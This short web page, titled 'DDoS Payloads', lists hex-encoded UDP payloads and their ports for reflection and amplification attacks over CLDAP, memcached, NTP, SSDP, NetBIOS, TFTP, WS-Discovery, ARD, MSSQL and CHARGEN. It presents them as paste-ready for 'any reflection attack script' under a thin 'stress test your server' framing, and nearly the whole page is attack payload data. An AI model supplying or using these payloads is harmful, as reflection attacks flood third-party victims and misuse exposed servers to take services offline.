DDoS Payloads

These are UDP payloads that will generate a response when sent to a server running with said protocol, often for many of these protocols (but not all) the response is larger then the packet sent, thus generating amplification by reflection.
These payloads and ports can be copied and pasted into any reflection attack script to instantly stress test your server - without making any other changes.
Protocol Port Payload
CLDAP389\x30\x84\x00\x00\x00\x2d\x02\x01\x07\x63\x84\x00\x00\x00\x24\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x64\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x43\x6c\x61\x73\x73\x30\x84\x00\x00\x00\x00
MEMCACHED11211\x00\x01\x00\x00\x00\x01\x00\x00\x73\x74\x61\x74\x73\x0d\x0a
WS-DISCOVERY3702\x3c\xaa\x3e
ARD3283\x00\x14\x00\x00
TFTP69\x00\x01\x2f\x78\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00
NTP123\x17\x00\x03\x2a\x00\x00\x00\x00
SSDP1900\x4d\x2d\x53\x45\x41\x52\x43\x48\x20\x2a\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d\x0a\x48\x6f\x73\x74\x3a\x32\x33\x39\x2e\x32\x35\x35\x2e\x32\x35\x35\x2e\x32\x35\x30\x3a\x31\x39\x30\x30\x0d\x0a\x53\x54\x3a\x73\x73\x64\x70\x3a\x61\x6c\x6c\x0d\x0a\x4d\x61\x6e\x3a\x22\x73\x73\x64\x70\x3a\x64\x69\x73\x63\x6f\x76\x65\x72\x22\x0d\x0a\x4d\x58\x3a\x33\x0d\x0a\x0d\x0a
NETBIOS137\xe5\xd8\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x20\x43\x4b\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x21\x00\x01
MSSQL1434\x02
CHARGEN19\x02
ConveyThis